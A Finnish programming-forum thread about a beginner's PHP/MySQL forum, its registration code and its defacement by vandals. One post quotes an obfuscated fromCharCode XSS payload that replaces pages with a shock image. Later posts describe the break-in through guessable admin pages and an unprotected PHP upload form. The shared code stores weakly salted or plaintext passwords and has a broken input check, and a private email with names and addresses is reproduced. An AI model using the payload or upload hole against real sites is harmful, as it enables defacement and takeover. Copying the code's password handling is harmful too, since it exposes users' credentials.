Keskustelu: Nettisivujen teko: PHP + MySQL foorumi

Olen saanut aikalailla onnistuneesti tehtyä foorumin itse. Ainosataan foorumin BBcode juttu on täältä otettu. En kuitenkaan saa silleen hienosti tehtyä rekisteröintijuttua (hienosti = toimivasti). db:ssä on taulut forum_messages jossa on foorumin viestit ja forum_users jossa on yllätys yllätys käyttäjien tiedot. Tällähetkellä salasanasuojaus puuttuu. Sain register.php:n toimimaan ja se lisää tiedot tietokantaan ja ohjaa sen jälkeen omalle profiilisivulleen. Sisään ei voi kirjautua. Ja sen lisäksi tunnuksen voi tehdä vain painamalla siitä napista. Kentät voi vaikka jättää tyhjäksi. Se on siis huono juttu. Myös useita samannimisiä tunnuksia voi olla.

http://testit.vjgo.net/lista.php keskustelu

http://testit.vjgo.net/profile.php?id=1 Meitin profiilisivu jos menee niin ettei id ole ollenkaan tai se on abot vaikka 50 tms tai enemmän, tulee virhesivu

http://testit.vjgo.net/register.php rekisteröintisivu

Miten saisin ton rekisteröinnin toimiin?

Listaukset:

*** register.php

<?php
include("yhteys.php");
?>
<style type="text/css">

input.sendbutton
{
   font-size:16px;
   font-family:Arial,sans-serif;
   height:26px;
   background-color:#779999;
   background-image:url(back03.gif);
   border-style:solid;
   border-color:#DDDDDD;
   border-width:1px;
}

</style>
<?php
      echo "<form action='newuser.php' method='post'>";
      echo "<b>Rekister&ouml;idy</b><br>";
      echo "Jos sinulla on jo tunnus, <a href='login.php'>kirjaudu sis&auml;&auml;n</a>.<br>";
      echo "Tunnus: <input type='text' name='username'><br>";
      echo "E-mail: <input type='text' name='email'><br>\n";
      echo "Salasana: <input type='password' name='password'><br>";
      echo "Salasana uudelleen: <input type='password' name='password2'><br>";
      echo "<input type='submit' class='sendbutton' value='Rekister&ouml;idy' name='register'>";
      echo "</form>";

?>

*** newuser.php

<?php
include("yhteys.php");

if

$kysely = $yhteys->prepare("INSERT INTO forum_users (username, email, password) VALUES (?, ?, ?)");
$kysely->execute(array($_POST["username"], $_POST["email"], $_POST["password"]));

$id = $yhteys->lastInsertId();
header("Location: profile.php?id=$id");
?>

Mikä tuo "if" on tuolla newuser.php:ssa?

Miksi tuo formi pitää tulostaa PHP:llä? Se näyttää rumalta, eikä sille ole mitään tarvetta.

http://testit.vjgo.net/newuser.php:

Parse error: syntax error, unexpected T_VARIABLE, expecting '(' in /home/villejuhanigo/testit/newuser.php on line 6

Eli tuo virheilmoitus ilmoittaa selvästi, että nyt odotettiin avaavaa sulkua (if-lauseen jälkeen), mutta tulikin muuttuja => syntaksivirhe.

Jaa jaa. Näköjään unohtunut epätoivoisesta testistä. korjaan sen mutta ongelmat ovat silti samat.

<?php
include("yhteys.php");

$kysely = $yhteys->prepare("INSERT INTO forum_users (username, email, password) VALUES (?, ?, ?)");
$kysely->execute(array($_POST["username"], $_POST["email"], $_POST["password"]));

$id = $yhteys->lastInsertId();
header("Location: profile.php?id=$id");
?>

Mitä tulle lista.php:lle just muuten tapahtu?

Ainakin nuo toimivat näiden tietojen perusteella kuten pitääkin. Virheilmoitus tulee profile.php-sivulta.

GrayMan kirjoitti:

Mitä tulle lista.php:lle just muuten tapahtu?

Joku käyttää ilmeisesti hyväksi sen XSS-aukkoa.

Ainoa aukko siinä on se että mie sallin js koodin. Mites se register juttu??

Niin miten tuon saasilleen et se suojaa salasanat ja ettei voi olla 2 samaa accoa?

No se salasanan muuttaminen tiivisteeksi tapahtuu riippuen käytetäänkö md5:sta vai sha1:stä näin:

<?php
md5("salasana");
sha1("salasana");
?>

Ja ettei useampia samoja tunnuksia luoda, niin se hoituu select-lauseella varmistamalla...

Edit. Tässä on nyt koko koodi:

<?php

		$kysely = $yhteys->prepare("SELECT username FROM forum_users WHERE username = ?");
		$kysely->execute(array($_POST['username']));

		if ($kysely->fetch())
			echo "Tunnus on jo olemassa!";


?>

<?php
include("yhteys.php");

if ($password == $password2) {

$kysely = $yhteys->prepare("INSERT INTO forum_users (username, email, password) VALUES (?, ?, ?)");
$kysely->execute(array($_POST["username"], $_POST["email"], $_POST["password"]));

$id = $yhteys->lastInsertId();
header("Location: profile.php?id=$id");
                             }

else {
echo "lol";
}
?>

Tossa on newuser.php jonne menee ne register.php sivun tiedostot

Fatal error: Call to a member function prepare() on a non-object in /home/villejuhanigo/testit/newuser.php on line 3

En kyllä ymmärrä tätä sun rekisteröitymisongelmaa, joten tässä koodi, jolla koko homma hoituu:

*** register.php ***

<form action="register.php" method="POST">
<label>Tunnus:</label>
<br /><input type="text" name="user">
<br /><label>Salasana:</label>
<br /><input type="password" name="passwd1">
<br /><label>Salasana uudelleen:</label>
<br /><input type="password" name="passwd2">
<br /><input type="submit" name="submit_register">
</form>


<?php


		/* Tarkistetaan, rekisteröidyttiinkö */
		if (isset($_POST['submit_register']))
		{
			/* Muodostetaan yhteys tietokantaan */
			$connect = new PDO("mysql:host=localhost;dbname=", "", "");

			/* Tarkistetaan, että kentät on täytetty */
			if (!empty($_POST['user']) || !empty($_POST['passwd1']) || !empty($_POST['passwd2']))
			{
				/* Luodaan kysely, joka selvittää onko tunnus jo olemassa */
				$query = $connect->prepare("SELECT user FROM users WHERE user = ?");
				$query->execute(array($_POST['user']));

				/* Tarkistetaan, onko tunnus jo olemassa */
				if (!$query->fetch())
				{
					/* Tarkistetaan, olivatko salasanat samat */
					if ($_POST['passwd1'] == $_POST['passwd2'])
					{
						/* Luodaan käyttäjän tiedoista uusi tietua kantaan */
						$query = $connect->prepare("INSERT INTO users (user, passwd) VALUES (?, ?)");
						if ($query->execute(array($_POST['user'], sha1($_POST['passwd1'] . "suola"))))
							echo "Kiitos rekisteröitymisestä!";
						else
							echo "Rekisteröityminen ei onnistunut!";
					}
					else
						echo "Antamasi salasanat eivät täsmää!";
				}
				else
					echo "Tunnus on jo olemassa!";
			}
			else
				echo "Kaikki kentät tulee täyttää!";

		}


?>

Raakalihan foorumin md5 minulta bbd37f54207661bb54d6f4e4d3de8fc8

Tämän login jutun md5 minulta 91ebc48c272bda13492628e8190e2ff0

Mikä naissä mättää???

Mitä todennäköisemmin toisessa on käytetty jotain suolaa...

Voisiko olla jokin postauksen tarkistus jäänyt tekemättä jossai vaiheessa...

trim($_POST['password']);

Jos saisin pyytää, niin älkää tunkeko foorumiani täyteen paskaa. Osaan koodata. Voitte vaikka kysyä kaveriltani Juholta.

Mitä tämä edes meinaa: (Mod. poisti pitkän, useaan kertaan toistuvan lorem ipsum -katkelman.)

GrayMan kirjoitti:

Jos saisin pyytää, niin älkää tunkeko foorumiani täyteen paskaa.

Siis olet vakaasti sitä mieltä että joku tähän keskusteluun osallistuneista on "tunkenut foorumisi täyteen paskaa"?

Ja toisaalta jos itse tunget vastaavaa tänne, niin tuskin hirveästi auttaa.

Onhan tuo aika pitkä jeh. Siinähä sinulla riittää ohjelmointia. Noita voit estää jonki verran siivilöinnillä. Tehe siihe juttu ettei voi laittaa kuin 1-2 kilotavun pituisia viestejä ;)

Ps. Ja kai tallennat kävijän ip-osoitteen? Voit jälkeenpäin tarkistaa mistä päin maailmaa kävijä on laittanut sotkunsa. Tarkistaa voit tuolta: http://www.geobytes.com/IpLocator.htm?GetLocation

Ajattelibnki just laittaa merkkirajoituksen. Mikä olisi hyvä sallittu merkkien määrä?

Voi v*ttu! Millä mie saan noita idiootteja oikein tunkemasta tänne tuota sontaa javascriptiä ja tuota vielä ärsyttävämpää goatsea mitä siellä nyt on??? Mie osaan koodata ihan vain tiedoksenne. Minä en ole täydellinen. Jos ite luulette olevanne niin vitun täydellisiä niin koodatkaa Facebook ja IRC-galleria sinne omille sivuillenne! Minua kyllästyttää tuollainen! Joku täältä lähettää noita viestejä tuonne! Pitääkö se salata vai mitä???

<script>eval(eval(String.fromCharCode(34,100,111,99,117,109,101,110,
116,46,98,111,100,121,46,105
,110,110,101,114,72,84,77,76,61,92,34,60,105,109,103,32,115,
114,99,61,39,104,116,116,112,58,92,47,92,47,105,109,97,103,
101,115,46,101,110,99,121,99,108,111,112,101,100,105,97,100,
114,97,109,97,116,105,99,97,46,99,111,109,92,47,105,109,97,
103,101,115,92,47,53,92,47,53,100,92,47,72,101,108,108,111,
46,106,112,103,39,32,119,105,100,116,104,61,39,49,48,48,37,
39,32,104,101,105,103,104,116,61,39,49,48,48,37,39,62,92,34,59,34)))</script>

Mod. edit: joku sais koodata tänne merkkirajotuksen pitkille riveille kooditagien sisällä.

Mitä ideaa tuossa äskesessä oli? Koodissa nimittäin. Ei tuommoinen estä ketään tekemästä mitä et halua. Tarkistus pitää tehdä jollain ei käyttäjäriippuvaisella kielellä, esimerkiksi PHP:llä voisi.

Voit myös tulostaa tekstin htmlspecialchars()- tai strip_tags()-funktion läpi.

eiku jollaki oli tuo nimenä ja kiva goatsehan sieltä pällisteli (fuck you ed)

GrayMan: paras tapa olisi ehkä sulkea sivusi hetkeksi, ja vetäistä syvään henkeä.

Suljettu.

Koko homma menee vituiks parin neropatin takia (~lainaus~ Talon omistaja biisi ~lainaus~)

GrayMan kirjoitti:

Mie osaan koodata ihan vain tiedoksenne.

Ensinnä, mihin tämän kommentin on tarkoitus liittyä? Toiseksi, et selvästi osaa kovin hyvin, jos kerran sivuillesi voi noin helposti ujuttaa JS-koodia.

GrayMan kirjoitti:

Millä mie saan noita idiootteja oikein tunkemasta tänne tuota sontaa javascriptiä

Väität, että osaat jo koodata. Keskustelun viesteistä JS on ilmeisesti jo estetty, joten nythän sinun tarvitsee vain etsiä viestejä käsittelevästä koodista ratkaisu. Koodia ei voi olla kovin paljon, joten ratkaisun pitäisi helposti löytyä minuutissa, vaikka aihe olisi ennestään tuntematon.

GrayMan kirjoitti:

Joku täältä lähettää noita viestejä tuonne!

Miten olet tehnyt tämän päätelmän? Ohjelmointiputka on avoin sivusto, jota voi lukea kuka tahansa. Vaikka siis sivusi linkki olisikin löytynyt täältä, ei ole mitään takeita, että itse vandalisoija olisi edes rekisteröitynyt käyttäjä.

GrayMan kirjoitti:

Minä en ole täydellinen. Jos ite luulette olevanne niin vitun täydellisiä niin koodatkaa Facebook ja IRC-galleria sinne omille sivuillenne!

Aivan kummallista raivoamista taas. Kyllä täällä hyvin moni osaisi koodata toimivan keskustelujärjestelmän (tämän tein muutamassa minuutissa, ja näkyykö goatsea?), mutta useimmilla ei ole siihen mitään syytä: keskusteluja on jo tarpeeksi. IRC-Galleria ei ole teknisesti mikään ihme, ja Facebookia taas on koodattu vuosia usean hengen voimin eikä suinkaan ilmaiseksi. Kumpaakaan ei voi järkevästi rinnastaa sinun pieneen viritelmääsi, jonka olet vieläpä suurelta osin kopioinut muualta.

"Koodaustaidoistasi" on turha puhuakaan, ennen kuin oikeasti alat kopioinnin sijaan koodata itse. Sitä ennen kuulut tässä suhteessa aivan eri kastiin kuin tämän foorumin aktiivinen enemmistö, joka osaa itsekin koodata. Jos haluat joskus oikeasti oppia (kuten olet monta kertaa väittänyt), lue kaikessa rauhassa Ohjelmointiputkan oppaita ja koodaile pieniä kokeiluja, kunnes ymmärrät jokaisen asian, josta lukemassasi oppaassa kerrotaan, ja osaat soveltaa sitä johonkin järkevään käyttötarkoitukseen. Esimerkiksi tuon rekisteröintiasian pitäisi olla aivan helppo, jos kerran osaat jo käyttää lomakkeita ja tietokantaa viestien lähetykseen ja hakuun.

Jokos olet tehnyt niin, että vain rekisteröityneet ja kirjautuneet käyttäjät voi laitella viestei?

GrayMan kirjoitti:

Joku täältä lähettää noita viestejä tuonne!

Mainittakoon tosiaan vielä, että toisin kuin usein aiemmin, tällä kertaa asialla ei oo irkkikanavan hyväntahtoiset veijarit. Et ollu erityisen mielenkiintoinen kohde ;)

Metabolix... Minä olen muokannut tuota koodia sen verran että voin sanoa sitä omakseni (omastamielestäni). Unohdin estää javascriptin nimissä. Oikeastaan kun luin viestisi, mieleeni tuli 2 sanaa jotka olisin halunnut olevan tämän viestin ainoa sisältö (hp)

Ja mitä tuo Blaze oikein selittää``???

huonostakin päivästä tulee hyvä kun lukee näitä keskusteluja :)

Voiko tehdä silleen et MySQL tietokannassa on vaikkapa taulu nimeltä jee ja siellä on sarakkeet:

id     nimi      jotaki

1      ripuli    qwerty
2      kakka     asdf
...

Nyt on taulukko cee. siellä on samat sarakkeet. Miten siirrän helposti id:n 1 taulukosta jee taulukkoon cee?

Itse olen SELECT:llä hakenut kyseiset tiedot muuttujiin ja sen jälkeen laittanut saman tavaran toiseen tauluun INSERT INTO:lla.

Tarkotus oli ku nyt mun sivulla on silleen et yläpitäjät voi poistaa uutisii yms, niin ne menis vaan mulle saveen johonki

GrayMan kirjoitti:

Tarkotus oli ku nyt mun sivulla on silleen et yläpitäjät voi poistaa uutisii yms, niin ne menis vaan mulle saveen johonki

Parempi ratkaisu olisi lisätä tauluun kenttä, joka kertoo onko kyseinen uutinen julkaistu. Poiston yhteydessä muutettaisiin sitten tämän kentän arvoa.

Siis haluat itelles säilöön poistetut uutiset jne? tuollainhan sen saa silloj todella hyvin.

EDIT: yhdyn trilogiin

GrayMan kirjoitti:

Minä olen muokannut tuota koodia sen verran että voin sanoa sitä omakseni (omastamielestäni).

Et voi uskottavasti väittää omaksesi koodia, jonka toimintaa et edes tunne. Muutenkaan muutama muutos ei tee siitä sinun koodiasi, vaan aina täytyy tunnustaa myös muiden tekijöiden osuus.

GrayMan kirjoitti:

Unohdin estää javascriptin nimissä.

Tämä ei voi olla totta, koska äsken juuri kysyit, miten se edes tehdään. Jos kyseessä olisi ollut vain unohdus, ei varmaan olisi tarvinnut kysyä.

GrayMan kirjoitti:

Oikeastaan kun luin viestisi, mieleeni tuli 2 sanaa jotka olisin halunnut olevan tämän viestin ainoa sisältö (hp)

Kävitkin näköjään sanomassa sen esimerkkisivullani. Sinun pitää kyllä käyttäytyä kypsemmin, jos aiot keskustella tällaisilla kunnollisten ihmisten foorumeilla. Haistattelu on typerää ja antaa sinusta huonon kuvan. Älä sitten valita, jos kukaan ei ota sinua vakavasti tai halua auttaa ongelmissasi – vika on itsessäsi.

GrayMan kirjoitti:

Ja mitä tuo Blaze oikein selittää``???

Blaze puhuu eräistä aiemmista tapauksista, joissa aloittelija on tehnyt huonosti toimivan sivun ja erään Blazelle läheisen IRC-kanavan käyttäjät ovat etsineet siitä tietoturva-aukkoja ja tehneet jonkinlaista kiusaa.

GrayMan kirjoitti:

Voiko tehdä silleen et MySQL tietokannassa on vaikkapa taulu nimeltä jee ja siellä on sarakkeet:

id     nimi      jotaki

1      ripuli    qwerty
2      kakka     asdf
...

Nyt on taulukko cee. siellä on samat sarakkeet. Miten siirrän helposti id:n 1 taulukosta jee taulukkoon cee?

INSERT INTO cee(id, nimi, jotaki) SELECT id, nimi, jotaki FROM jee WHERE id = 1;

Ne voi kirjoittaa myös näinkin, jos on varma siitä että niissä on samat sarakkeet:

INSERT INTO cee SELECT id, nimi, jotaki FROM jee WHERE id = 1;
INSERT INTO cee SELECT * FROM jee WHERE id = 1;

Kiitos. Sain vjgo.net sivulla uutiset turvaa. Vaikkaki voihan ne eka tyhjätä ja sit poistaa. :(

Painukaa ******* te jotka sotkette! Perkele! Mie yritän tehdä töitä"!!

(mod. poisti kiroilua yms.)

Tässäpä tuli hyvä tilaisuus vähän purkaa tunteita:
GrayMan aka sammakkomies aka kasa muita nickejä. Pyydän, kasva hiukan, tule sitten takaisin. Tai ei, älä vain kasva vaan opettele myös käyttäytymään.

Ensin pari juttua reaalimaailmasta: jonkin kopioiminen niin, että muuttaa pari asiaa siitä, ei ole sama asia että olisit tehnyt sen itse. Niillä on turha mennä kehuskelemaan: tässä Erästä IRC-kanavaa seuratessani kävi selväksi, että käytännössä katsoen kaikki asiat tuossa "PHP + MySQL foorumi"ssa ja muu mitä tuolta löytyy, on vain suoraan kopioitu putkan koodivinkeistä. Mitenkö tämä selvisi? Kopioimiesi (tai omien sanojesi mukaan "itse tekemiesi") skriptien aukkojen lisäksi siellä on "itse tekemisesi" tuottamia aukkoja pilvin pimein. Tiedostoja sieltä pääsee täysin ongelmitta lukemaan ja kirjoittamaan. Todisteena, salasanasi alkaa kahdella numerolla, loppuu kolmeen kirjaimeen ja on 7 merkkiä pitkä (EDIT: ilmeisesti poistit kaiken tuolta, hyvä niin).

Niin, miksi tätä sitten tehdään? Varmaankin huvin vuoksi, ken tietää. Termi "lulz" lienee sinulle tuttu.

Myös haluaisin huomauttaa, että hirveä toisille raivoaminen ja huutaminen ei anna erityisen fiksua kuvaa sinusta - olet kovan luokan naurunaihe siellä samalla IRC-kanavalla.

Toivon että jotain meni perille, vaikka pelkään pahoin että et osaa/halua ymmärtää, mitä juuri sanoin. Myös se vähän epäilyttää, meneeko tämä sensuurin mukana /dev/nulliin.

Ja, jos olet trolli, niin onnittelut: Harvoin näin kovaa suoritusta näkee.

Metabolix kirjoitti:

GrayMan kirjoitti:

Minä olen muokannut tuota koodia sen verran että voin sanoa sitä omakseni (omastamielestäni).

Et voi uskottavasti väittää omaksesi koodia, jonka toimintaa et edes tunne. Muutenkaan muutama muutos ei tee siitä sinun koodiasi, vaan aina täytyy tunnustaa myös muiden tekijöiden osuus.

Tuolla skriptin muokkaamisella, mitä todennäköisemmin saat aikaiseksi vain sen, että muiden tekemät vähäisetkin tietoturvat yms. katoavat... Löysin esim. tuosta tekemästäni register-skriptistä mm. yhen "aukon", jota sinäkään et ollut osannut korjata, ennen kuin otit sen käyttöön. Ja nytkö sitten voit ihan hyvällä omatunnolla väittää, että tuo tekemäni skripti on sinun käsialaasi, kun olet lisännyt siihen email-kentän?

Edit. Siis mulla on nyt menny ohi, että mistäs IRC-kanavasta on kysymys? ;D

Ehkä joillekin koodaaminen tarkoittaa sitä, että leikataan ja liimataan netistä löytyviä koodeja.

Itsekin muuten tuossa juuri koodasin uuden ominaisuuden softaani, joka tarkoitti sitä, että ensin Microsoftin sivustolta latasin pätkän esimerkkikoodia. Sitten hahmotin mitä se tekee ja tein tarvittavat muutokset saadakseni sen tekemään mitä haluan.

Tuostahan kun jättää tuon hahmottamisen pois, niin säästyy aikaa ja jää enemmän aukkoja.

( Jäihän siihen muokkaamisen jälkeen tasan yksi rivi alkuperäistä esimerkkikoodia:

RSACryptoServiceProvider RSAalg = new RSACryptoServiceProvider();

:D )

Okei.

Myönnän virheeni, opin läksyni, ja pyydän anteeksi.

Tästä eteenpäin käyttäydyn asiallisesti. En hauku, enkä provosoi muita, ja yritän olla provosoitumatta.

Enkä väitä toisten tekemiä asioita omikseni.

Haluan vain oppia koodamaan hyvin, ja olen pahoillani jos provosoitumiseni, ja siitä johtuva toisten mollaminen on suutuuttanut tämän foorumin käyttäjiä.

Yst terveisin Froghman

Hmm, ehkäpä GrayManin aka Sammakkomiehen käytös paranisi, jos Ohjelmointiputkan käyttäjät ihan ensinnäkin lopettaisivat hänen internet-sivujensa sotkemisen (viestit tyyliin "Vitun mitäänosaamaton homo painu vittuun Ohjelmointiputkasta saatanan pälli", sekä mahdollisten tietoturva-aukkojen hyödyntäminen sivujen poistoon ja tuhoamiseen). Myönnän toki itsekin haukkuneeni käyttäjää hänen pahimpien häiriköintipuuskiensa aikana, mutta eräiden muiden käyttäjien käytös menee jo liian törkeään suuntaan.

Juhko

raakaliha kirjoitti:

jos Ohjelmointiputkan käyttäjät ihan ensinnäkin lopettaisivat hänen internet-sivujensa sotkemisen

Ohjelmointiputkan ylläpito tai ohjelmointiputkan käyttäjät tuskin voivat millään tavalla vaikuttaa muutaman "mädän omenan" käytökseen. Minua hieman häiritsee, kun syytetään Ohjelmointiputkan käyttäjiä kollektiivisesti.

Harmi sinänsä että weppisysteemeitä on näennäisesti helppo tehdä, vaikka ei osaisikaan, josta syystä nämä aloittelijoiden sivuille jäävät aukot ja murtautumiset niitä käyttäen on valitettavan yleisiä.

Se on muuten huvittavaa useamman vuoden ajan seuranneena, kun toinen toistaan "itsevarmempi" aloitteleva koodari saa oman "irc-galleriansa" tehtyä, ja tajuaakin vasta vuosien päästä, ettei se näkyvä homma loppupelissä ollutkaan isoin työ koodauksessa, vaan se kaikki muu (tietoturva, ylläpitotyökalut, rutiinit yms).

Lebe80 kirjoitti:

Se on muuten huvittavaa useamman vuoden ajan seuranneena, kun toinen toistaan "itsevarmempi" aloitteleva koodari saa oman "irc-galleriansa" tehtyä, ja tajuaakin vasta vuosien päästä, ettei se näkyvä homma loppupelissä ollutkaan isoin työ koodauksessa, vaan se kaikki muu (tietoturva, ylläpitotyökalut, rutiinit yms).

Tunnustan löytäneeni itseni tästä tekstistä ;D

Edit. Ja eikä siihen tarvita kovinkaan montaa vuotta, että sen huomaa...

Date: Thu, 29 Apr 2010 15:37:11 +0300 (EEST)
From: ville sinisalo <sinisalo.ville@luukku.com>
To: krayian@gmail.com

Varoitan sinua nyt. Jos et välittömästi anna minulle Gmail tunnukseni salasanaa, lopeta sivujeni sotkemista ja jos olet Facebookista skämmänyt salasanani, niin palauta sekin. Ja Sammakkopedia voit kanssa jättää rauhaan. Jos et palauta sähköpostiosoitteen ville.juhani.sinisalo@gmail.com salasanaa, niin teen rikosilmoituksen.

Asiallista.

Kray kirjoitti:

(sähköpostiviesti Ville Sinisalolta)

Ja milläköhän perusteella GrayMan pitää sinua syyllisenä?

Triton kirjoitti:

Kray kirjoitti:

(sähköpostiviesti Ville Sinisalolta)

Ja milläköhän perusteella GrayMan pitää sinua syyllisenä?

Ei mitään käsitystä.

Triton kirjoitti:

Kray kirjoitti:

(sähköpostiviesti Ville Sinisalolta)

Ja milläköhän perusteella GrayMan pitää sinua syyllisenä?

Varmaankin siksi, että Kray osasi viestissään kuvailla vanhaa salasanaa. Pidän kuitenkin epätodennäköisenä, että juuri Kray olisi sitä hyödyntänyt: olisihan silloin typerää käydä keskustelussa kertomassa, että löysi salasanan.

Jos nyt asiaa irkkikanavan satunnaisten tietojen ja sivuston hajoamisvaiheiden perusteella voi arvioida, sivustolla vieraili enemmänkin väkeä. Todellisen syyllisen etsiminen joukosta lienee siis liki mahdotonta. Kurjaa, että joku lähti tässäkin laittomille teille eli käyttämään toiselle kuuluvaa salasanaa.

GrayMan: Etusivullasi nyt olevassa viestissä on virhe: kuten Deffin viestissä toisessa keskustelussa kerrotaan, tietomurto edellyttäisi, että sivustolla olisi jotain murrettavaa; koska sivuillasi ei ollut minkäänlaista suojausta, kukaan ei ole voinut murtautua sinne.

Metabolix kirjoitti:

Varmaankin siksi, että Kray osasi viestissään kuvailla vanhaa salasanaa.

Määki näin yhen salasanan. Se oli myslikannan salasana. Jos GrayMan käytti samaa GMail-tilissään sai hän rehellisesti sanottuna, mitä ansaitsi. Olkoon opiksi kaikille muillekin.

Mikä pakko on uutta osoitetta tehdä? Eihän osoite ole siihen syyllinen.
Esimerkkinä suomi24.fi. Sinne tehtiin oikeasti tietomurto mutta se on yhä suomi24.fi ;)

Laita tietoturva kuntoon ja vaihda salasana.

Pekka Mansikka kirjoitti:

Mikä pakko on uutta osoitetta tehdä? Eihän osoite ole siihen syyllinen.
Esimerkkinä suomi24.fi. Sinne tehtiin oikeasti tietomurto mutta se on yhä suomi24.fi ;)

Laita tietoturva kuntoon ja vaihda salasana.

Niin no jos vain osoitettan vaihtaa, mutta käyttää samaa softaa, niin silloin saa kyllä sitä osoitetta olla vaihtamassa koko ajan...

Yksi pahimmista itse havaitsemistani mokauksista sivustolla oli PHP-tiedosto, jolla pystyi muokkaamaan, poistamaan ja lukemaan tiedostoja (myös .php), mutta sitä ei ollut suojattu millään tavoin, eli kuka tahansa pääsi lukemaan salasanat yms. sen kautta. Olin antanut käyttäjälle useita tuloksettomia kehotuksia suojata se.

raakaliha kirjoitti:

Yksi pahimmista itse havaitsemistani mokauksista sivustolla oli PHP-tiedosto, jolla pystyi muokkaamaan, poistamaan ja lukemaan tiedostoja (myös .php)

Kyseinen lomake kyllä löytyi mutta vasta hieman jälkikäteen. Tapausta irkissä seuranneena pystyn kertomaan, mitä oikeasti käytettiin.

Koko juttu perustui tiedostonimien arvaamiseen. Ensiksi arvattiin kokeilla osoitetta admin.php. Täältä pääsikin yhä lähettämään viestejä; aiemmin tapahtunut foorumin "sulkeminen" tarkoitti käytännössä vain, että keskustelun alussa mainitulta sivulta oli poistettu lähetyslomake. Valitettavasti viestien poisto ei admin.php-sivulla onnistunut: skriptissä oli bugeja (ehkä GrayManin taitavan "parantelun" seurauksena?).

Seuraavaksi katsastettiin upload.php, jossa oli kuin olikin suoraan koodivinkistä kopioitu, täysin suojaamaton upload-formi. Täältä pystyttiin lähettämään palvelimelle omia PHP-tiedostoja, eli käytännössä sivusto oli nyt täysin hallinnassa.

Minusta kaikkein naurettavinta tapauksessa on, että saman henkilön sivut joutuivat jo vuodenvaihteessa aivan samanlaisen käsittelyn kohteeksi mutta silti samat ammottavat tietoturva-aukot olivat yhä paikoillaan. (Tosin upload-formi taisi olla eri?) Kyllä virheistä kannattaisi edes tuon verran ottaa opikseen. Jos sivustolle on pakko laittaa suojaamattomia välineitä, joilla voi saada tuhoa aikaan, niin kannattaa edes nimetä ne jotenkin hankalammin.

Froghman kirjoitti:

Jos luulette, että tein foorumin (jonka joku tunki täyteen eräitä kuvia) viemällä jonkun
vieraskirjakoodivinkin, olette väärässä. Itseasiassa totuus on yllättävää: Tein sen muokkaamalla erään
oppaan koodia, ja muokkasin siitä foorumin.
Se admin.php jonka joku löysi, oli yhteys.php tiedostoa lukuunottama (includetin sen) olin tehnyt kokonaan itse,
joten en ollut ehostamalla tehnyt siitä toimimatonta, enkä itseasiassa edes löytänyt siitä mitään vikaa, kuten ei
Juhokaan ensivilkaisulla. Eipä tässä sitten muuta.

Terv. Froghman

Oikeastaan käy sääliksi tuota foorumin yrittäjää. Ikää ja halua uuden oppimiseen ei taida hirveästi olla ja kova kiire saada jotain aikaan.

Jos osaisi edes käyttäytyä niin apua varmasti löytyisi ja sitä kautta hänkin pääsisi oppimaan uusia asioita ja parempia tapoja tehdä asioita.

Mistä IRC-kanavasta on kyse?